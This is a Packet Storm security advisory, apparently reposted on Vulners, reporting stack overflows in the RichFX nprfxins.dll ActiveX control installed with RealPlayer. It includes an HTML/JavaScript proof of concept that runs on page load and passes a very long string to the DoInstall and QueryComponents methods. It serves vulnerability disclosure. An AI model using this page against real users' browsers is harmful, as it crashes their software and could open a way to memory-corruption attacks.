Lucene search
K

richfx-overflow.txt

🗓️ 27 Nov 2007 00:00:00Reported by Elazar BroadType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 15 Views

There are multiple stack overflows in the RichFX nprfxins.dll ActiveX Control installed with RealNetworks RealPlayer

Code
`There are multiple stack overflows in the RichFX nprfxins.dll ActiveX Control. I almost positive that this control was installed with RealNetworks RealPlayer. This was tested on Windows XP SP2 fully patched and IE6. This control is marked safe for scripting. I have not tested code execution. PoC as follows:  
  
------------  
<!--  
written by e.b.  
-->  
<html>  
<head>  
<script language="JavaScript" DEFER>  
function Check() {  
var s = "AAAA";  
  
while (s.length < 999999) s=s+s;  
  
var obj = new ActiveXObject("RFXInstMgr.RFXInstMgr"); //{47F59200-8783-11D2-8343-00A0C945A819}  
  
  
obj.DoInstall(s);   
obj.QueryComponents(s);   
  
}  
</script>  
  
</head>  
<body onload="JavaScript: return Check();">  
  
</body>  
</html>   
  
------------  
  
  
Elazar  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation